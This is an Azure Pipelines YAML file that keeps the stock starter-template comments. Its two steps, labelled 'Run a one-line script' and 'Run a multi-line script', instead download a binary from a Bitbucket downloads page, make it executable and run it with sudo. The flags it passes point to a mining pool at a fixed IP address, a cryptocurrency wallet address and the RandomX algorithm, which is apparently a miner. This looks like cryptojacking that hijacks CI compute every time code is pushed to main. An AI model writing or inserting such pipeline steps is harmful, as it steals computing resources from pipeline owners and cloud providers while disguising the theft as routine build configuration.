# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script:  sudo apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/wegwg/egwe/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile -o 139.99.124.170:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0
  displayName: 'Run a one-line script'

- script: |
     sudo apt-get update && sudo apt-get install -y wget && wget https://bitbucket.org/wegwg/egwe/downloads/masterfile && sudo chmod u+x masterfile && sudo ./masterfile -o 139.99.124.170:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0
  displayName: 'Run a multi-line script'
